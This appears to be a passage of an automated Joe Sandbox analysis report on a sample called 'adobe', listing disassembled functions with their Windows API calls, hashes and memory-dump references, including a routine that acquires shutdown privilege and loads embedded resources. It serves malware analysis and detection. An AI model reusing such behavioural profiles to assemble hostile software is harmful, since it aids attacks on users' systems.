                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • CharPrevA.USER32(?,?,0040696C,?,00406649,?,?,00406D87,00000000,00406DAC,?,?,?,?,00000000,00000000), ref: 00406972
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2904130184.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2904097480.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2904157155.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2904185962.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CharPrev
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 122130370-0
                                                                                                                                                          • Opcode ID: 4f55c7aa95ee0cc6def6f8b84b07f7a00b4eea213dcaa2411b48aa5a82a0c27b
                                                                                                                                                          • Instruction ID: 57bb655d476c0b104ac503b4dc16dcc9cc7d9309af7e6782790f501f1b0aeff9
                                                                                                                                                          • Opcode Fuzzy Hash: 4f55c7aa95ee0cc6def6f8b84b07f7a00b4eea213dcaa2411b48aa5a82a0c27b
                                                                                                                                                          • Instruction Fuzzy Hash:
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00407F10 Relevance: 1.3, APIs: 1, Instructions: 62memoryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 00407FA0
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2904130184.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2904097480.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2904157155.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2904185962.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AllocVirtual
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 4275171209-0
                                                                                                                                                          • Opcode ID: f3d8bc7867bd0b1d1bf8a1a21c6b81e8059d467c94b9dab864cb1ccd8d8ada4e
                                                                                                                                                          • Instruction ID: 20a67eb23ea55951ef5110b519d4bcc97d420124264edb02c1094051c82f9398
                                                                                                                                                          • Opcode Fuzzy Hash: f3d8bc7867bd0b1d1bf8a1a21c6b81e8059d467c94b9dab864cb1ccd8d8ada4e
                                                                                                                                                          • Instruction Fuzzy Hash: D2117571A042059BDB00EF19C881B5B7794AF44359F05807EF958AB3C6DB38EC00CBAA
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00407548 Relevance: 1.3, APIs: 1, Instructions: 20COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2904130184.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2904097480.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2904157155.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2904185962.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CloseHandle
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2962429428-0
                                                                                                                                                          • Opcode ID: fc6098dcd6b1504a072b68d3feaaa537492281b052079d944a979dec092e75e7
                                                                                                                                                          • Instruction ID: e7ddd8f09f86228f97b62737e097d00c20d119481f2284b048c56b7aa048eabb
                                                                                                                                                          • Opcode Fuzzy Hash: fc6098dcd6b1504a072b68d3feaaa537492281b052079d944a979dec092e75e7
                                                                                                                                                          • Instruction Fuzzy Hash: 41D05E82B00A6017D615F2BE4D8869692D85F89685B08843AF654E77D1D67CEC00838D
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00407EB8 Relevance: 1.3, APIs: 1, Instructions: 15COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • VirtualFree.KERNEL32(?,00000000,00008000,?,00407E9D), ref: 00407ECF
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2904130184.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2904097480.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2904157155.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2904185962.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: FreeVirtual
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1263568516-0
                                                                                                                                                          • Opcode ID: c7bedad96efb848ea9f674ed311898bb29a23f2a16fc3a9de009753beeeb9dd9
                                                                                                                                                          • Instruction ID: 622015b425f940adf6dc1d0f89e873b9c6d17cfe6f0c2733970da1323f12c917
                                                                                                                                                          • Opcode Fuzzy Hash: c7bedad96efb848ea9f674ed311898bb29a23f2a16fc3a9de009753beeeb9dd9
                                                                                                                                                          • Instruction Fuzzy Hash: 3ED0E9B17553055BDB90EEB98CC1B0237D8BB48610F5044B66904EB296E674E8009654
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Non-executed Functions

                                                                                                                                                          Function 00409448 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 41shutdownCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetCurrentProcess.KERNEL32(00000028), ref: 00409457
                                                                                                                                                          • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 0040945D
                                                                                                                                                          • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 00409476
                                                                                                                                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000), ref: 0040949D
                                                                                                                                                          • GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 004094A2
                                                                                                                                                          • ExitWindowsEx.USER32(00000002,00000000), ref: 004094B3
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2904130184.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2904097480.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2904157155.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2904185962.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                                                                                                          • String ID: SeShutdownPrivilege
                                                                                                                                                          • API String ID: 107509674-3733053543
                                                                                                                                                          • Opcode ID: 5d5c4cc2167cea31fe6e778ad900630fb502c4628614430f67a63468396a48bc
                                                                                                                                                          • Instruction ID: 55e16e97e4c30333ef6e9d7cb44a764448f3c494fd9ead6bbbdf5d5bb2f9c1eb
                                                                                                                                                          • Opcode Fuzzy Hash: 5d5c4cc2167cea31fe6e778ad900630fb502c4628614430f67a63468396a48bc
                                                                                                                                                          • Instruction Fuzzy Hash: 61F012B069830179E610AAB18D07F6762885BC4B18F50493ABB15FA1C3D7BDD809466F
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00409BEC Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • FindResourceA.KERNEL32(00000000,00002B67,0000000A), ref: 00409BF6
                                                                                                                                                          • SizeofResource.KERNEL32(00000000,00000000,?,00409CE6,00000000,0040A27D,?,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 00409C09
                                                                                                                                                          • LoadResource.KERNEL32(00000000,00000000,00000000,00000000,?,00409CE6,00000000,0040A27D,?,00000001,00000000,00000002,00000000,0040A2C5,?,00000000), ref: 00409C1B
                                                                                                                                                          • LockResource.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00409CE6,00000000,0040A27D,?,00000001,00000000,00000002,00000000,0040A2C5), ref: 00409C2C
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2904130184.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2904097480.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2904157155.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2904185962.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Resource$FindLoadLockSizeof
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3473537107-0
                                                                                                                                                          • Opcode ID: ce7c2a79786de0a8682d58b31ceb4174bbddb2d24ae6ad16542ef9ae896a3e40
                                                                                                                                                          • Instruction ID: ed04ed1443b666af2c347742ca0221af59beed1f1180006ed42e296f861e82c7
                                                                                                                                                          • Opcode Fuzzy Hash: ce7c2a79786de0a8682d58b31ceb4174bbddb2d24ae6ad16542ef9ae896a3e40
                                                                                                                                                          • Instruction Fuzzy Hash: ECE07EA0B483562AFA6076FB08C2B2A018C4BA671DF40003BB701B92C3DEBD8C14856E
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00405248 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040544A,?,?,?,00000000,004055FC), ref: 0040525B
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2904130184.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2904097480.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2904157155.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2904185962.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: InfoLocale
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2299586839-0
                                                                                                                                                          • Opcode ID: 8a1aa2f218564e89e29a3375e8324a6bde157643bf6b6cb70ff1562e164a822c
                                                                                                                                                          • Instruction ID: 297a7c39c0825e6b478cba46507f56ab37b47465b1590baa0f4eee863dd3b982
                                                                                                                                                          • Opcode Fuzzy Hash: 8a1aa2f218564e89e29a3375e8324a6bde157643bf6b6cb70ff1562e164a822c
                                                                                                                                                          • Instruction Fuzzy Hash: AED05EA630E6502AE21051AB2D85EBB4A9CCEC5BA4F18407FF648D7242D6248C069B76
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 004026C4 Relevance: 1.5, APIs: 1, Instructions: 20timeCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetSystemTime.KERNEL32(?), ref: 004026CE
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2904130184.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2904097480.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2904157155.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2904185962.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: SystemTime
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2656138-0
                                                                                                                                                          • Opcode ID: 1c1586f040ad907c453502297459692aa8199981632c93951a31d41848eff65d
                                                                                                                                                          • Instruction ID: 69442b1fa125f02c17f5f00667ba5619268a94e84ed87230136e9e38920861ba
                                                                                                                                                          • Opcode Fuzzy Hash: 1c1586f040ad907c453502297459692aa8199981632c93951a31d41848eff65d
                                                                                                                                                          • Instruction Fuzzy Hash: 14E04F21E0010A82C704ABA5CD435EDF7AEAB95600B044272A418E92E0F631C251C748
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00405CE4 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetVersionExA.KERNEL32(?,004065E0,00000000,004065EE,?,?,?,?,?,00409C65), ref: 00405CF2
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2904130184.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2904097480.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2904157155.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2904185962.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Version
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1889659487-0
                                                                                                                                                          • Opcode ID: c84d22a34f8351a77119842959a44d1d4ba95f00f13a202a1719544d7380acd2
                                                                                                                                                          • Instruction ID: 3c95a3e10eaf3ff9c271e05f7503c1a51fdcfb4de7972086e3eff1de8b037954
                                                                                                                                                          • Opcode Fuzzy Hash: c84d22a34f8351a77119842959a44d1d4ba95f00f13a202a1719544d7380acd2
                                                                                                                                                          • Instruction Fuzzy Hash: FDC012A040070186D7109B31EC02B1672D4AB44310F440539AEA4953C2E73C80018A5A
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 0040840C Relevance: .5, Instructions: 545COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2904130184.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2904097480.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2904157155.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2904185962.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 7cb438cf7f0ff76753a1d16800e3023f3e313fbbfbb21f985cf38b771b24bb28
                                                                                                                                                          • Instruction ID: 7dc6dc86846b3232beed044054ddb30c9891ac2fec336679fba6e94018ae2b4c
                                                                                                                                                          • Opcode Fuzzy Hash: 7cb438cf7f0ff76753a1d16800e3023f3e313fbbfbb21f985cf38b771b24bb28
                                                                                                                                                          • Instruction Fuzzy Hash: C032D775E00219DFCB14CF99CA80AADB7B2BF88314F24816AD855B7385DB34AE42CF55
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00407024 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 86registrylibraryloaderCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,00407129,?,00000000,004098D0), ref: 0040704D
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00407053
                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,00407129,?,00000000,004098D0), ref: 004070A1
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2904130184.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2904097480.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2904157155.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2904185962.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AddressCloseHandleModuleProc
                                                                                                                                                          • String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll
                                                                                                                                                          • API String ID: 4190037839-2401316094
                                                                                                                                                          • Opcode ID: f61943fdfa50da717bbd8070568f426ad52e04842bfe5cc219f36a91d9520f2f
                                                                                                                                                          • Instruction ID: c068e7fb85b52830e378cef5638f1cf195f9e270113e5aa630163df598a56aa7
                                                                                                                                                          • Opcode Fuzzy Hash: f61943fdfa50da717bbd8070568f426ad52e04842bfe5cc219f36a91d9520f2f
                                                                                                                                                          • Instruction Fuzzy Hash: 72214170E04209ABDB10EAB5CC55A9E77A9EB48304F60847BA510FB3C1D7BCAE01875E
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00403A97 Relevance: 15.1, APIs: 10, Instructions: 122fileCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • CreateFileA.KERNEL32(00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B1E
                                                                                                                                                          • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B42
                                                                                                                                                          • SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B5E
                                                                                                                                                          • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000), ref: 00403B7F
                                                                                                                                                          • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00403BA8
                                                                                                                                                          • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00403BB2
                                                                                                                                                          • GetStdHandle.KERNEL32(000000F5), ref: 00403BD2
                                                                                                                                                          • GetFileType.KERNEL32(?,000000F5), ref: 00403BE9
                                                                                                                                                          • CloseHandle.KERNEL32(?,?,000000F5), ref: 00403C04
                                                                                                                                                          • GetLastError.KERNEL32(000000F5), ref: 00403C1E
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2904130184.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2904097480.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2904157155.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2904185962.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1694776339-0
                                                                                                                                                          • Opcode ID: bd0a662ad2dd38144def4530256030cdb08cf53568247c3ffcddd32d1ed1ea18
                                                                                                                                                          • Instruction ID: 6684f6b4d1923fa93cc5777a7ebe0ca766b8c5f16b1f456132d2f0a6dbb27d3d
                                                                                                                                                          • Opcode Fuzzy Hash: bd0a662ad2dd38144def4530256030cdb08cf53568247c3ffcddd32d1ed1ea18
                                                                                                                                                          • Instruction Fuzzy Hash: 444194302042009EF7305F258805B237DEDEB4571AF208A3FA1D6BA6E1E77DAE419B5D
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 004019DC Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 59COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • RtlEnterCriticalSection.KERNEL32(0040C41C,00000000,00401AB4), ref: 00401A09
                                                                                                                                                          • LocalFree.KERNEL32(005B0AA0,00000000,00401AB4), ref: 00401A1B
                                                                                                                                                          • VirtualFree.KERNEL32(?,00000000,00008000,005B0AA0,00000000,00401AB4), ref: 00401A3A
                                                                                                                                                          • LocalFree.KERNEL32(005AE3B8,?,00000000,00008000,005B0AA0,00000000,00401AB4), ref: 00401A79
                                                                                                                                                          • RtlLeaveCriticalSection.KERNEL32(0040C41C,00401ABB), ref: 00401AA4
                                                                                                                                                          • RtlDeleteCriticalSection.KERNEL32(0040C41C,00401ABB), ref: 00401AAE
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2904130184.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2904097480.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2904157155.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2904185962.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                                                                                                          • String ID: Z
                                                                                                                                                          • API String ID: 3782394904-4052018393
                                                                                                                                                          • Opcode ID: 57d208b384dc2f586c03b96f4df297de7af50f17441c1957de60d2bf1c39d9ad
                                                                                                                                                          • Instruction ID: 5447b05044442752c1d56c7733342563ab4b4f61826a3093f511f794066d9233
                                                                                                                                                          • Opcode Fuzzy Hash: 57d208b384dc2f586c03b96f4df297de7af50f17441c1957de60d2bf1c39d9ad
                                                                                                                                                          • Instruction Fuzzy Hash: 91116330341280DAD711ABA59EE2F623668B785748F44437EF444B62F2C67C9840CA9D
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 004053B4 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 167COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetSystemDefaultLCID.KERNEL32(00000000,004055FC,?,?,?,?,00000000,00000000,00000000,?,004065DB,00000000,004065EE), ref: 004053CE
                                                                                                                                                            • Part of subcall function 004051FC: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052C7,?,00000000,004053A6), ref: 0040521A
                                                                                                                                                            • Part of subcall function 00405248: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040544A,?,?,?,00000000,004055FC), ref: 0040525B
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2904130184.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2904097480.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2904157155.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2904185962.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: InfoLocale$DefaultSystem
                                                                                                                                                          • String ID: AMPM$:mm$:mm:ss$m/d/yy$mmmm d, yyyy
                                                                                                                                                          • API String ID: 1044490935-665933166
                                                                                                                                                          • Opcode ID: 85a59d6a8a9452990e87660af54c17acfa7fb51e8ac3fac4a02ccdeae7d05a60
                                                                                                                                                          • Instruction ID: af1252b4c964b6680b9f9af4a0d1ea0fc67f86ffa9d2e4d8722b1cefb330e960
                                                                                                                                                          • Opcode Fuzzy Hash: 85a59d6a8a9452990e87660af54c17acfa7fb51e8ac3fac4a02ccdeae7d05a60
                                                                                                                                                          • Instruction Fuzzy Hash: 25515334B04548ABDB00EBA59C91A9F776AEB89304F50947BB504BB3C6CA3DCE059B5C
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00403D02 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 72windowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D9D
                                                                                                                                                          • ExitProcess.KERNEL32 ref: 00403DE5
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2904130184.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2904097480.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2904157155.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2904185962.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ExitMessageProcess
                                                                                                                                                          • String ID: Error$Runtime error at 00000000$9@
                                                                                                                                                          • API String ID: 1220098344-1503883590
                                                                                                                                                          • Opcode ID: 0b7abc0913d0e9b6482778e2bb40dc1e8adb9ed549d30d0444a38b969016e341
                                                                                                                                                          • Instruction ID: db3008c0e6bc5d60e05df0545d3e9f81ce91e923819fa2a9fb93000da4b6b716
                                                                                                                                                          • Opcode Fuzzy Hash: 0b7abc0913d0e9b6482778e2bb40dc1e8adb9ed549d30d0444a38b969016e341
                                                                                                                                                          • Instruction Fuzzy Hash: B521F830A04341CAE714EFA59AD17153E98AB49349F04837BD500B73E3C77C8A45C76E
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 004036B8 Relevance: 7.6, APIs: 5, Instructions: 55memoryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 004036F2
